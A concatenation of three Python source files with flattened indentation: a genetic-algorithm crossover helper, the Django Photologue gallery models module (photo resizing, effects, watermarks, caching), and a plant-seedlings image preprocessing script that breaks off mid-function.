def multiple_chromosome_n_point_crossover(random, mom, dad, args):
children = MultipleChromosomeGenome(keys=mom.keys)
for key in children.keys:
children[key] = set_n_point_crossover(random, [mom[key], dad[key]], args)
return children
|
<gh_stars>100-1000
import logging
import os
import random
import unicodedata
from datetime import datetime
from functools import partial
from importlib import import_module
from inspect import isclass
from io import BytesIO
import exifread
from django.conf import settings
from django.contrib.sites.models import Site
from django.core.exceptions import ValidationError
from django.core.files.base import ContentFile
from django.core.files.storage import default_storage
from django.core.validators import RegexValidator
from django.db import models
from django.db.models.signals import post_save
from django.template.defaultfilters import slugify
from django.urls import reverse
from django.utils.encoding import filepath_to_uri, force_str, smart_str
from django.utils.safestring import mark_safe
from django.utils.timezone import now
from django.utils.translation import gettext_lazy as _
from PIL import Image, ImageEnhance, ImageFile, ImageFilter
from sortedm2m.fields import SortedManyToManyField
from .managers import GalleryQuerySet, PhotoQuerySet
from .utils.reflection import add_reflection
from .utils.watermark import apply_watermark
logger = logging.getLogger('photologue.models')
# Default limit for gallery.latest
LATEST_LIMIT = getattr(settings, 'PHOTOLOGUE_GALLERY_LATEST_LIMIT', None)
# Number of random images from the gallery to display.
SAMPLE_SIZE = getattr(settings, 'PHOTOLOGUE_GALLERY_SAMPLE_SIZE', 5)
# max_length setting for the ImageModel ImageField
IMAGE_FIELD_MAX_LENGTH = getattr(settings, 'PHOTOLOGUE_IMAGE_FIELD_MAX_LENGTH', 100)
# Path to sample image
SAMPLE_IMAGE_PATH = getattr(settings, 'PHOTOLOGUE_SAMPLE_IMAGE_PATH', os.path.join(
os.path.dirname(__file__), 'res', 'sample.jpg'))
# Modify image file buffer size.
ImageFile.MAXBLOCK = getattr(settings, 'PHOTOLOGUE_MAXBLOCK', 256 * 2 ** 10)
# Photologue image path relative to media root
PHOTOLOGUE_DIR = getattr(settings, 'PHOTOLOGUE_DIR', 'photologue')
# Look for user function to define file paths
PHOTOLOGUE_PATH = getattr(settings, 'PHOTOLOGUE_PATH', None)
if PHOTOLOGUE_PATH is not None:
if callable(PHOTOLOGUE_PATH):
get_storage_path = PHOTOLOGUE_PATH
else:
parts = PHOTOLOGUE_PATH.split('.')
module_name = '.'.join(parts[:-1])
module = import_module(module_name)
get_storage_path = getattr(module, parts[-1])
else:
def get_storage_path(instance, filename):
fn = unicodedata.normalize('NFKD', force_str(filename)).encode('ascii', 'ignore').decode('ascii')
return os.path.join(PHOTOLOGUE_DIR, 'photos', fn)
# Support CACHEDIR.TAG spec for backups for ignoring cache dir.
# See http://www.brynosaurus.com/cachedir/spec.html
PHOTOLOGUE_CACHEDIRTAG = os.path.join(PHOTOLOGUE_DIR, "photos", "cache", "CACHEDIR.TAG")
if not default_storage.exists(PHOTOLOGUE_CACHEDIRTAG):
default_storage.save(PHOTOLOGUE_CACHEDIRTAG, ContentFile(
b"Signature: 8a477f597d28d172789f06886806bc55"))
# Exif Orientation values
# Value 0thRow 0thColumn
# 1 top left
# 2 top right
# 3 bottom right
# 4 bottom left
# 5 left top
# 6 right top
# 7 right bottom
# 8 left bottom
# Image Orientations (according to EXIF informations) that needs to be
# transposed and appropriate action
IMAGE_EXIF_ORIENTATION_MAP = {
2: Image.FLIP_LEFT_RIGHT,
3: Image.ROTATE_180,
6: Image.ROTATE_270,
8: Image.ROTATE_90,
}
# Quality options for JPEG images
JPEG_QUALITY_CHOICES = (
(30, _('Very Low')),
(40, _('Low')),
(50, _('Medium-Low')),
(60, _('Medium')),
(70, _('Medium-High')),
(80, _('High')),
(90, _('Very High')),
)
# choices for new crop_anchor field in Photo
CROP_ANCHOR_CHOICES = (
('top', _('Top')),
('right', _('Right')),
('bottom', _('Bottom')),
('left', _('Left')),
('center', _('Center (Default)')),
)
IMAGE_TRANSPOSE_CHOICES = (
('FLIP_LEFT_RIGHT', _('Flip left to right')),
('FLIP_TOP_BOTTOM', _('Flip top to bottom')),
('ROTATE_90', _('Rotate 90 degrees counter-clockwise')),
('ROTATE_270', _('Rotate 90 degrees clockwise')),
('ROTATE_180', _('Rotate 180 degrees')),
)
WATERMARK_STYLE_CHOICES = (
('tile', _('Tile')),
('scale', _('Scale')),
)
# Prepare a list of image filters
filter_names = []
for n in dir(ImageFilter):
klass = getattr(ImageFilter, n)
if isclass(klass) and issubclass(klass, ImageFilter.BuiltinFilter) and \
hasattr(klass, 'name'):
filter_names.append(klass.__name__)
IMAGE_FILTERS_HELP_TEXT = _('Chain multiple filters using the following pattern "FILTER_ONE->FILTER_TWO->FILTER_THREE"'
'. Image filters will be applied in order. The following filters are available: %s.'
% (', '.join(filter_names)))
size_method_map = {}
class TagField(models.CharField):
"""Tags have been removed from Photologue, but the migrations still refer to them so this
Tagfield definition is left here.
"""
def __init__(self, **kwargs):
default_kwargs = {'max_length': 255, 'blank': True}
default_kwargs.update(kwargs)
super().__init__(**default_kwargs)
def get_internal_type(self):
return 'CharField'
class Gallery(models.Model):
date_added = models.DateTimeField(_('date published'),
default=now)
title = models.CharField(_('title'),
max_length=250,
unique=True)
slug = models.SlugField(_('title slug'),
unique=True,
max_length=250,
help_text=_('A "slug" is a unique URL-friendly title for an object.'))
description = models.TextField(_('description'),
blank=True)
is_public = models.BooleanField(_('is public'),
default=True,
help_text=_('Public galleries will be displayed '
'in the default views.'))
photos = SortedManyToManyField('photologue.Photo',
related_name='galleries',
verbose_name=_('photos'),
blank=True)
sites = models.ManyToManyField(Site, verbose_name=_('sites'),
blank=True)
objects = GalleryQuerySet.as_manager()
class Meta:
ordering = ['-date_added']
get_latest_by = 'date_added'
verbose_name = _('gallery')
verbose_name_plural = _('galleries')
def __str__(self):
return self.title
def get_absolute_url(self):
return reverse('photologue:pl-gallery', args=[self.slug])
def latest(self, limit=LATEST_LIMIT, public=True):
if not limit:
limit = self.photo_count()
if public:
return self.public()[:limit]
else:
return self.photos.filter(sites__id=settings.SITE_ID)[:limit]
def sample(self, count=None, public=True):
"""Return a sample of photos, ordered at random.
If the 'count' is not specified, it will return a number of photos
limited by the GALLERY_SAMPLE_SIZE setting.
"""
if not count:
count = SAMPLE_SIZE
if count > self.photo_count():
count = self.photo_count()
if public:
photo_set = self.public()
else:
photo_set = self.photos.filter(sites__id=settings.SITE_ID)
return random.sample(set(photo_set), count)
def photo_count(self, public=True):
"""Return a count of all the photos in this gallery."""
if public:
return self.public().count()
else:
return self.photos.filter(sites__id=settings.SITE_ID).count()
photo_count.short_description = _('count')
def public(self):
"""Return a queryset of all the public photos in this gallery."""
return self.photos.is_public().filter(sites__id=settings.SITE_ID)
def orphaned_photos(self):
"""
Return all photos that belong to this gallery but don't share the
gallery's site.
"""
return self.photos.filter(is_public=True) \
.exclude(sites__id__in=self.sites.all())
class ImageModel(models.Model):
image = models.ImageField(_('image'),
max_length=IMAGE_FIELD_MAX_LENGTH,
upload_to=get_storage_path)
date_taken = models.DateTimeField(_('date taken'),
null=True,
blank=True,
help_text=_('Date image was taken; is obtained from the image EXIF data.'))
view_count = models.PositiveIntegerField(_('view count'),
default=0,
editable=False)
crop_from = models.CharField(_('crop from'),
blank=True,
max_length=10,
default='center',
choices=CROP_ANCHOR_CHOICES)
effect = models.ForeignKey('photologue.PhotoEffect',
null=True,
blank=True,
related_name="%(class)s_related",
verbose_name=_('effect'),
on_delete=models.CASCADE)
class Meta:
abstract = True
def EXIF(self, file=None):
try:
if file:
tags = exifread.process_file(file)
else:
with self.image.storage.open(self.image.name, 'rb') as file:
tags = exifread.process_file(file, details=False)
return tags
except:
return {}
def admin_thumbnail(self):
func = getattr(self, 'get_admin_thumbnail_url', None)
if func is None:
return _('An "admin_thumbnail" photo size has not been defined.')
else:
if hasattr(self, 'get_absolute_url'):
return mark_safe('<a href="{}"><img src="{}"></a>'.format(self.get_absolute_url(), func()))
else:
return mark_safe('<a href="{}"><img src="{}"></a>'.format(self.image.url, func()))
admin_thumbnail.short_description = _('Thumbnail')
admin_thumbnail.allow_tags = True
def cache_path(self):
return os.path.join(os.path.dirname(self.image.name), "cache")
def cache_url(self):
return '/'.join([os.path.dirname(self.image.url), "cache"])
def image_filename(self):
return os.path.basename(force_str(self.image.name))
def _get_filename_for_size(self, size):
size = getattr(size, 'name', size)
base, ext = os.path.splitext(self.image_filename())
return ''.join([base, '_', size, ext])
def _get_SIZE_photosize(self, size):
return PhotoSizeCache().sizes.get(size)
def _get_SIZE_size(self, size):
photosize = PhotoSizeCache().sizes.get(size)
if not self.size_exists(photosize):
self.create_size(photosize)
try:
return Image.open(self.image.storage.open(
self._get_SIZE_filename(size))).size
except:
return None
def _get_SIZE_url(self, size):
photosize = PhotoSizeCache().sizes.get(size)
if not self.size_exists(photosize):
self.create_size(photosize)
if photosize.increment_count:
self.increment_count()
return '/'.join([
self.cache_url(),
filepath_to_uri(self._get_filename_for_size(photosize.name))])
def _get_SIZE_filename(self, size):
photosize = PhotoSizeCache().sizes.get(size)
return smart_str(os.path.join(self.cache_path(),
self._get_filename_for_size(photosize.name)))
def increment_count(self):
self.view_count += 1
models.Model.save(self)
def __getattr__(self, name):
global size_method_map
if not size_method_map:
init_size_method_map()
di = size_method_map.get(name, None)
if di is not None:
result = partial(getattr(self, di['base_name']), di['size'])
setattr(self, name, result)
return result
else:
raise AttributeError
def size_exists(self, photosize):
func = getattr(self, "get_%s_filename" % photosize.name, None)
if func is not None:
if self.image.storage.exists(func()):
return True
return False
def resize_image(self, im, photosize):
cur_width, cur_height = im.size
new_width, new_height = photosize.size
if photosize.crop:
ratio = max(float(new_width) / cur_width, float(new_height) / cur_height)
x = (cur_width * ratio)
y = (cur_height * ratio)
xd = abs(new_width - x)
yd = abs(new_height - y)
x_diff = int(xd / 2)
y_diff = int(yd / 2)
if self.crop_from == 'top':
box = (int(x_diff), 0, int(x_diff + new_width), new_height)
elif self.crop_from == 'left':
box = (0, int(y_diff), new_width, int(y_diff + new_height))
elif self.crop_from == 'bottom':
# y - yd = new_height
box = (int(x_diff), int(yd), int(x_diff + new_width), int(y))
elif self.crop_from == 'right':
# x - xd = new_width
box = (int(xd), int(y_diff), int(x), int(y_diff + new_height))
else:
box = (int(x_diff), int(y_diff), int(x_diff + new_width), int(y_diff + new_height))
im = im.resize((int(x), int(y)), Image.ANTIALIAS).crop(box)
else:
if not new_width == 0 and not new_height == 0:
ratio = min(float(new_width) / cur_width,
float(new_height) / cur_height)
else:
if new_width == 0:
ratio = float(new_height) / cur_height
else:
ratio = float(new_width) / cur_width
new_dimensions = (int(round(cur_width * ratio)),
int(round(cur_height * ratio)))
if new_dimensions[0] > cur_width or \
new_dimensions[1] > cur_height:
if not photosize.upscale:
return im
im = im.resize(new_dimensions, Image.ANTIALIAS)
return im
def create_size(self, photosize, recreate=False):
if self.size_exists(photosize) and not recreate:
return
try:
im = Image.open(self.image.storage.open(self.image.name))
except OSError:
return
# Save the original format
im_format = im.format
# Apply effect if found
if self.effect is not None:
im = self.effect.pre_process(im)
elif photosize.effect is not None:
im = photosize.effect.pre_process(im)
# Rotate if found & necessary
if 'Image Orientation' in self.EXIF() and \
self.EXIF().get('Image Orientation').values[0] in IMAGE_EXIF_ORIENTATION_MAP:
im = im.transpose(
IMAGE_EXIF_ORIENTATION_MAP[self.EXIF().get('Image Orientation').values[0]])
# Resize/crop image
if (im.size != photosize.size and photosize.size != (0, 0)) or recreate:
im = self.resize_image(im, photosize)
# Apply watermark if found
if photosize.watermark is not None:
im = photosize.watermark.post_process(im)
# Apply effect if found
if self.effect is not None:
im = self.effect.post_process(im)
elif photosize.effect is not None:
im = photosize.effect.post_process(im)
# Save file
im_filename = getattr(self, "get_%s_filename" % photosize.name)()
try:
buffer = BytesIO()
if im_format != 'JPEG':
im.save(buffer, im_format)
else:
# Issue #182 - test fix from https://github.com/bashu/django-watermark/issues/31
if im.mode.endswith('A'):
im = im.convert(im.mode[:-1])
im.save(buffer, 'JPEG', quality=int(photosize.quality),
optimize=True)
buffer_contents = ContentFile(buffer.getvalue())
self.image.storage.save(im_filename, buffer_contents)
except OSError as e:
if self.image.storage.exists(im_filename):
self.image.storage.delete(im_filename)
raise e
def remove_size(self, photosize, remove_dirs=True):
if not self.size_exists(photosize):
return
filename = getattr(self, "get_%s_filename" % photosize.name)()
if self.image.storage.exists(filename):
self.image.storage.delete(filename)
def clear_cache(self):
cache = PhotoSizeCache()
for photosize in cache.sizes.values():
self.remove_size(photosize, False)
def pre_cache(self, recreate=False):
cache = PhotoSizeCache()
if recreate:
self.clear_cache()
for photosize in cache.sizes.values():
if photosize.pre_cache:
self.create_size(photosize, recreate)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._old_image = self.image
def save(self, *args, **kwargs):
recreate = kwargs.pop('recreate', False)
image_has_changed = False
if self._get_pk_val() and (self._old_image != self.image):
image_has_changed = True
# If we have changed the image, we need to clear from the cache all instances of the old
# image; clear_cache() works on the current (new) image, and in turn calls several other methods.
# Changing them all to act on the old image was a lot of changes, so instead we temporarily swap old
# and new images.
new_image = self.image
self.image = self._old_image
self.clear_cache()
self.image = new_image # Back to the new image.
self._old_image.storage.delete(self._old_image.name) # Delete (old) base image.
if self.date_taken is None or image_has_changed:
# Attempt to get the date the photo was taken from the EXIF data.
try:
exif_date = self.EXIF(self.image.file).get('EXIF DateTimeOriginal', None)
if exif_date is not None:
d, t = exif_date.values.split()
year, month, day = d.split(':')
hour, minute, second = t.split(':')
self.date_taken = datetime(int(year), int(month), int(day),
int(hour), int(minute), int(second))
except:
logger.error('Failed to read EXIF DateTimeOriginal', exc_info=True)
super().save(*args, **kwargs)
self.pre_cache(recreate)
def delete(self):
assert self._get_pk_val() is not None, \
"%s object can't be deleted because its %s attribute is set to None." % \
(self._meta.object_name, self._meta.pk.attname)
self.clear_cache()
# Files associated to a FileField have to be manually deleted:
# https://docs.djangoproject.com/en/dev/releases/1.3/#deleting-a-model-doesn-t-delete-associated-files
# http://haineault.com/blog/147/
# The data loss scenarios mentioned in the docs hopefully do not apply
# to Photologue!
super().delete()
self.image.storage.delete(self.image.name)
class Photo(ImageModel):
title = models.CharField(_('title'),
max_length=250,
unique=True)
slug = models.SlugField(_('slug'),
unique=True,
max_length=250,
help_text=_('A "slug" is a unique URL-friendly title for an object.'))
caption = models.TextField(_('caption'),
blank=True)
date_added = models.DateTimeField(_('date added'),
default=now)
is_public = models.BooleanField(_('is public'),
default=True,
help_text=_('Public photographs will be displayed in the default views.'))
sites = models.ManyToManyField(Site, verbose_name=_('sites'),
blank=True)
objects = PhotoQuerySet.as_manager()
class Meta:
ordering = ['-date_added']
get_latest_by = 'date_added'
verbose_name = _("photo")
verbose_name_plural = _("photos")
def __str__(self):
return self.title
def save(self, *args, **kwargs):
# If crop_from or effect property has been changed on existing image,
# update kwargs to force image recreation in parent class
current = Photo.objects.get(pk=self.pk) if self.pk else None
if current and (current.crop_from != self.crop_from or current.effect != self.effect):
kwargs.update(recreate=True)
if self.slug is None:
self.slug = slugify(self.title)
super().save(*args, **kwargs)
def get_absolute_url(self):
return reverse('photologue:pl-photo', args=[self.slug])
def public_galleries(self):
"""Return the public galleries to which this photo belongs."""
return self.galleries.filter(is_public=True)
def get_previous_in_gallery(self, gallery):
"""Find the neighbour of this photo in the supplied gallery.
We assume that the gallery and all its photos are on the same site.
"""
if not self.is_public:
raise ValueError('Cannot determine neighbours of a non-public photo.')
photos = gallery.photos.is_public()
if self not in photos:
raise ValueError('Photo does not belong to gallery.')
previous = None
for photo in photos:
if photo == self:
return previous
previous = photo
def get_next_in_gallery(self, gallery):
"""Find the neighbour of this photo in the supplied gallery.
We assume that the gallery and all its photos are on the same site.
"""
if not self.is_public:
raise ValueError('Cannot determine neighbours of a non-public photo.')
photos = gallery.photos.is_public()
if self not in photos:
raise ValueError('Photo does not belong to gallery.')
matched = False
for photo in photos:
if matched:
return photo
if photo == self:
matched = True
return None
class BaseEffect(models.Model):
name = models.CharField(_('name'),
max_length=30,
unique=True)
description = models.TextField(_('description'),
blank=True)
class Meta:
abstract = True
def sample_dir(self):
return os.path.join(PHOTOLOGUE_DIR, 'samples')
def sample_url(self):
return settings.MEDIA_URL + '/'.join([PHOTOLOGUE_DIR, 'samples',
'{} {}.jpg'.format(self.name.lower(), 'sample')])
def sample_filename(self):
return os.path.join(self.sample_dir(), '{} {}.jpg'.format(self.name.lower(), 'sample'))
def create_sample(self):
try:
im = Image.open(SAMPLE_IMAGE_PATH)
except OSError:
raise OSError(
'Photologue was unable to open the sample image: %s.' % SAMPLE_IMAGE_PATH)
im = self.process(im)
buffer = BytesIO()
# Issue #182 - test fix from https://github.com/bashu/django-watermark/issues/31
if im.mode.endswith('A'):
im = im.convert(im.mode[:-1])
im.save(buffer, 'JPEG', quality=90, optimize=True)
buffer_contents = ContentFile(buffer.getvalue())
default_storage.save(self.sample_filename(), buffer_contents)
def admin_sample(self):
return '<img src="%s">' % self.sample_url()
admin_sample.short_description = 'Sample'
admin_sample.allow_tags = True
def pre_process(self, im):
return im
def post_process(self, im):
return im
def process(self, im):
im = self.pre_process(im)
im = self.post_process(im)
return im
def __str__(self):
return self.name
def save(self, *args, **kwargs):
try:
default_storage.delete(self.sample_filename())
except:
pass
models.Model.save(self, *args, **kwargs)
self.create_sample()
for size in self.photo_sizes.all():
size.clear_cache()
# try to clear all related subclasses of ImageModel
for prop in [prop for prop in dir(self) if prop[-8:] == '_related']:
for obj in getattr(self, prop).all():
obj.clear_cache()
obj.pre_cache()
def delete(self):
try:
default_storage.delete(self.sample_filename())
except:
pass
models.Model.delete(self)
class PhotoEffect(BaseEffect):
""" A pre-defined effect to apply to photos """
transpose_method = models.CharField(_('rotate or flip'),
max_length=15,
blank=True,
choices=IMAGE_TRANSPOSE_CHOICES)
color = models.FloatField(_('color'),
default=1.0,
help_text=_('A factor of 0.0 gives a black and white image, a factor of 1.0 gives the '
'original image.'))
brightness = models.FloatField(_('brightness'),
default=1.0,
help_text=_('A factor of 0.0 gives a black image, a factor of 1.0 gives the '
'original image.'))
contrast = models.FloatField(_('contrast'),
default=1.0,
help_text=_('A factor of 0.0 gives a solid grey image, a factor of 1.0 gives the '
'original image.'))
sharpness = models.FloatField(_('sharpness'),
default=1.0,
help_text=_('A factor of 0.0 gives a blurred image, a factor of 1.0 gives the '
'original image.'))
filters = models.CharField(_('filters'),
max_length=200,
blank=True,
help_text=_(IMAGE_FILTERS_HELP_TEXT))
reflection_size = models.FloatField(_('size'),
default=0,
help_text=_('The height of the reflection as a percentage of the orignal '
'image. A factor of 0.0 adds no reflection, a factor of 1.0 adds a'
' reflection equal to the height of the orignal image.'))
reflection_strength = models.FloatField(_('strength'),
default=0.6,
help_text=_('The initial opacity of the reflection gradient.'))
background_color = models.CharField(_('color'),
max_length=7,
default="#FFFFFF",
help_text=_('The background color of the reflection gradient. Set this to '
'match the background color of your page.'))
class Meta:
verbose_name = _("photo effect")
verbose_name_plural = _("photo effects")
def pre_process(self, im):
if self.transpose_method != '':
method = getattr(Image, self.transpose_method)
im = im.transpose(method)
if im.mode != 'RGB' and im.mode != 'RGBA':
return im
for name in ['Color', 'Brightness', 'Contrast', 'Sharpness']:
factor = getattr(self, name.lower())
if factor != 1.0:
im = getattr(ImageEnhance, name)(im).enhance(factor)
for name in self.filters.split('->'):
image_filter = getattr(ImageFilter, name.upper(), None)
if image_filter is not None:
try:
im = im.filter(image_filter)
except ValueError:
pass
return im
def post_process(self, im):
if self.reflection_size != 0.0:
im = add_reflection(im, bgcolor=self.background_color,
amount=self.reflection_size, opacity=self.reflection_strength)
return im
class Watermark(BaseEffect):
image = models.ImageField(_('image'),
upload_to=PHOTOLOGUE_DIR + "/watermarks")
style = models.CharField(_('style'),
max_length=5,
choices=WATERMARK_STYLE_CHOICES,
default='scale')
opacity = models.FloatField(_('opacity'),
default=1,
help_text=_("The opacity of the overlay."))
class Meta:
verbose_name = _('watermark')
verbose_name_plural = _('watermarks')
def delete(self):
assert self._get_pk_val() is not None, "%s object can't be deleted because its %s attribute is set to None." \
% (self._meta.object_name, self._meta.pk.attname)
super().delete()
self.image.storage.delete(self.image.name)
def post_process(self, im):
mark = Image.open(self.image.storage.open(self.image.name))
return apply_watermark(im, mark, self.style, self.opacity)
class PhotoSize(models.Model):
"""About the Photosize name: it's used to create get_PHOTOSIZE_url() methods,
so the name has to follow the same restrictions as any Python method name,
e.g. no spaces or non-ascii characters."""
name = models.CharField(_('name'),
max_length=40,
unique=True,
help_text=_(
'Photo size name should contain only letters, numbers and underscores. Examples: '
'"thumbnail", "display", "small", "main_page_widget".'),
validators=[RegexValidator(regex='^[a-z0-9_]+$',
message='Use only plain lowercase letters (ASCII), numbers and '
'underscores.'
)]
)
width = models.PositiveIntegerField(_('width'),
default=0,
help_text=_(
'If width is set to "0" the image will be scaled to the supplied height.'))
height = models.PositiveIntegerField(_('height'),
default=0,
help_text=_(
'If height is set to "0" the image will be scaled to the supplied width'))
quality = models.PositiveIntegerField(_('quality'),
choices=JPEG_QUALITY_CHOICES,
default=70,
help_text=_('JPEG image quality.'))
upscale = models.BooleanField(_('upscale images?'),
default=False,
help_text=_('If selected the image will be scaled up if necessary to fit the '
'supplied dimensions. Cropped sizes will be upscaled regardless of this '
'setting.')
)
crop = models.BooleanField(_('crop to fit?'),
default=False,
help_text=_('If selected the image will be scaled and cropped to fit the supplied '
'dimensions.'))
pre_cache = models.BooleanField(_('pre-cache?'),
default=False,
help_text=_('If selected this photo size will be pre-cached as photos are added.'))
increment_count = models.BooleanField(_('increment view count?'),
default=False,
help_text=_('If selected the image\'s "view_count" will be incremented when '
'this photo size is displayed.'))
effect = models.ForeignKey('photologue.PhotoEffect',
null=True,
blank=True,
related_name='photo_sizes',
verbose_name=_('photo effect'),
on_delete=models.CASCADE)
watermark = models.ForeignKey('photologue.Watermark',
null=True,
blank=True,
related_name='photo_sizes',
verbose_name=_('watermark image'),
on_delete=models.CASCADE)
class Meta:
ordering = ['width', 'height']
verbose_name = _('photo size')
verbose_name_plural = _('photo sizes')
def __str__(self):
return self.name
def clear_cache(self):
for cls in ImageModel.__subclasses__():
for obj in cls.objects.all():
obj.remove_size(self)
if self.pre_cache:
obj.create_size(self)
PhotoSizeCache().reset()
def clean(self):
if self.crop is True:
if self.width == 0 or self.height == 0:
raise ValidationError(
_("Can only crop photos if both width and height dimensions are set."))
def save(self, *args, **kwargs):
super().save(*args, **kwargs)
PhotoSizeCache().reset()
self.clear_cache()
def delete(self):
assert self._get_pk_val() is not None, "%s object can't be deleted because its %s attribute is set to None." \
% (self._meta.object_name, self._meta.pk.attname)
self.clear_cache()
super().delete()
def _get_size(self):
return (self.width, self.height)
def _set_size(self, value):
self.width, self.height = value
size = property(_get_size, _set_size)
class PhotoSizeCache:
__state = {"sizes": {}}
def __init__(self):
self.__dict__ = self.__state
if not len(self.sizes):
sizes = PhotoSize.objects.all()
for size in sizes:
self.sizes[size.name] = size
def reset(self):
global size_method_map
size_method_map = {}
self.sizes = {}
def init_size_method_map():
global size_method_map
for size in PhotoSizeCache().sizes.keys():
size_method_map['get_%s_size' % size] = \
{'base_name': '_get_SIZE_size', 'size': size}
size_method_map['get_%s_photosize' % size] = \
{'base_name': '_get_SIZE_photosize', 'size': size}
size_method_map['get_%s_url' % size] = \
{'base_name': '_get_SIZE_url', 'size': size}
size_method_map['get_%s_filename' % size] = \
{'base_name': '_get_SIZE_filename', 'size': size}
def add_default_site(instance, created, **kwargs):
"""
Called via Django's signals when an instance is created.
In case PHOTOLOGUE_MULTISITE is False, the current site (i.e.
``settings.SITE_ID``) will always be added to the site relations if none are
present.
"""
if not created:
return
if getattr(settings, 'PHOTOLOGUE_MULTISITE', False):
return
if instance.sites.exists():
return
instance.sites.add(Site.objects.get_current())
post_save.connect(add_default_site, sender=Gallery)
post_save.connect(add_default_site, sender=Photo)
|
<reponame>plantclassification/seedlings_classification
import numpy as np
import glob
import cv2
import os
import matplotlib.pyplot as plt
import logging
import torch
from torchvision import transforms
# Input ( ,256,256,4) Output( ,12)
CLASS = {
'Black-grass': 0,
'Charlock': 1,
'Cleavers': 2,
'Common Chickweed': 3,
'Common wheat': 4,
'Fat Hen': 5,
'Loose Silky-bent': 6,
'Maize': 7,
'Scentless Mayweed': 8,
'Shepherds Purse': 9,
'Small-flowered Cranesbill': 10,
'Sugar beet': 11
}
INV_CLASS = {
0: 'Black-grass',
1: 'Charlock',
2: 'Cleavers',
3: 'Common Chickweed',
4: 'Common wheat',
5: 'Fat Hen',
6: 'Loose Silky-bent',
7: 'Maize',
8: 'Scentless Mayweed',
9: 'Shepherds Purse',
10: 'Small-flowered Cranesbill',
11: 'Sugar beet'
}
class Preprocessing():
def __init__(self):
self.train_folder = '..\data\\train\\train'
self.test_folder = '..\data\\test\\test'
self.data_dict = {
"image":[],
"label":[]
}
self.test_dict = {
"image": [],
"label": [],
'id':[]
}
pass
@staticmethod
def create_mask_for_plant(image):
image_hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
sensitivity = 35
lower_hsv = np.array([60 - sensitivity, 100, 50])
upper_hsv = np.array([60 + sensitivity, 255, 255])
mask = cv2.inRange(image_hsv, lower_hsv, upper_hsv)
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (11, 11))
mask = cv2.morphologyEx(mask, cv2.MORPH_CLOSE, kernel)
return mask
def segment_plant(self, image):
mask = self.create_mask_for_plant(image)
output = cv2.bitwise_and(image, image, mask=mask)
return output
@staticmethod
def sharpen_image(image):
image_blurred = cv2.GaussianBlur(image, (0, 0), 3)
image_sharp = cv2.addWeighted(image, 1.5, image_blurred, -0.5, 0)
return image_sharp
def read_image(self):
for class_folder in os.listdir(self.train_folder):
class_path = os.path.join(self.train_folder, class_folder)
for image_path in glob.glob(os.path.join(class_path,'*.png')):
image = cv2.imread(image_path, cv2.IMREAD_COLOR)
image = cv2.resize(image, (224,224))
image_stack = self.segment_plant(image)
image_stack = self.sharpen_image(image_stack)
image_stack = cv2.cvtColor(image_stack, cv2.COLOR_RGB2GRAY)
image_stack = np.reshape(image_stack, (224, 224, 1))
input = np.concatenate((np.array(image), np.array(image_stack)), axis=2)
self.data_dict['image'].append(input)
self.data_dict['label'].append(class_folder)
self.data_dict['image'] = np.array(self.data_dict['image']).swapaxes(1,3)
self.data_dict['label'] = np.array([CLASS[i] for i in self.data_dict['label']])
logging.debug(self.data_dict['label'].shape)
logging.debug(self.data_dict['image'].shape)
def one_hot(num_list, class_number):
onehot_list = []
for i in range(len(num_list)):
one_hot_array = np.zeros(class_number)
one_hot_array[num_list[i]] += 1
onehot_list.append(one_hot_array)
return np.array(onehot_list)
#self.data_dict['label'] = one_hot(self.data_dict['label'], len(CLASS))
logging.debug(self.data_dict['label'].shape)
return self.data_dict
def read_image_simple(self, size=299, transform=None):
for class_folder in os.listdir(self.train_folder):
class_path = os.path.join(self.train_folder, class_folder)
for image_path in glob.glob(os.path.join(class_path,'*.png')):
image = cv2.imread(image_path, cv2.IMREAD_COLOR)
image = cv2.resize(image, (size,size))
# image_stack = self.segment_plant(image)
# image_stack = self.sharpen_image(image_stack)
# image_stack = cv2.cvtColor(image_stack, cv2.COLOR_RGB2GRAY)
# image_stack = np.reshape(image_stack, (224, 224, 1))
# input = np.concatenate((np.array(image), np.array(image_stack)), axis=2)
input = transform(image)
self.data_dict['image'].append(input)
self.data_dict['label'].append(class_folder)
# self.data_dict['image'] = np.array(self.data_dict['image']).swapaxes(1,3)
self.data_dict['image'] = torch.stack(self.data_dict['image'], dim=0)
self.data_dict['label'] = np.array([CLASS[i] for i in self.data_dict['label']])
self.data_dict['label'] = torch.from_numpy(self.data_dict['label'])
# logging.debug(self.data_dict['label'].shape)
# logging.debug(self.data_dict['image'].shape)
def one_hot(num_list, class_number):
onehot_list = []
for i in range(len(num_list)):
one_hot_array = np.zeros(class_number)
one_hot_array[num_list[i]] += 1
onehot_list.append(one_hot_array)
return np.array(onehot_list)
#self.data_dict['label'] = one_hot(self.data_dict['label'], len(CLASS))
# logging.debug(self.data_dict['label'].shape)
return self.data_dict
def plot_image(self):
for class_folder in os.listdir(self.train_folder):
class_path = os.path.join(self.train_folder, class_folder)
for image_path in glob.glob(os.path.join(class_path, '*.png')):
image = cv2.imread(image_path, cv2.IMREAD_COLOR)
plt.imshow(image)
plt.title('Raw image')
plt.show()
image = cv2.resize(image, (256, 256))
plt.imshow(image)
plt.title('Reshaped image')
plt.show()
image_stack = self.segment_plant(image)
image_stack = self.sharpen_image(image_stack)
image_stack = cv2.cvtColor(image_stack, cv2.COLOR_RGB2GRAY)
image_stack = np.reshape(image_stack, (256, 256, 1))
plt.imshow(np.reshape(image_stack, (256, 256)))
plt.title('Processed image')
plt.show()
break
break
def read_data_mini(self):
for class_folder in os.listdir(self.train_folder):
j = 0
class_path = os.path.join(self.train_folder, class_folder)
for image_path in glob.glob(os.path.join(class_path, '*.png')):
image = cv2.imread(image_path, cv2.IMREAD_COLOR)
image = cv2.resize(image, (224, 224))
image_stack = self.segment_plant(image)
image_stack = self.sharpen_image(image_stack)
image_stack = cv2.cvtColor(image_stack, cv2.COLOR_RGB2GRAY)
image_stack = np.reshape(image_stack, (224, 224, 1))
input = np.concatenate((np.array(image), np.array(image_stack)), axis=2)
self.data_dict['image'].append(input)
self.data_dict['label'].append(class_folder)
j += 1
if j > 9:
break
self.data_dict['image'] = np.array(self.data_dict['image']).swapaxes(1,3)
self.data_dict['label'] = np.array([CLASS[i] for i in self.data_dict['label']])
logging.debug(self.data_dict['label'].shape)
logging.debug(self.data_dict['image'].shape)
def one_hot(num_list, class_number):
onehot_list = []
for i in range(len(num_list)):
one_hot_array = np.zeros(class_number)
one_hot_array[num_list[i]] += 1.
onehot_list.append(one_hot_array)
return np.array(onehot_list)
#self.data_dict['label'] = one_hot(self.data_dict['label'], len(CLASS))
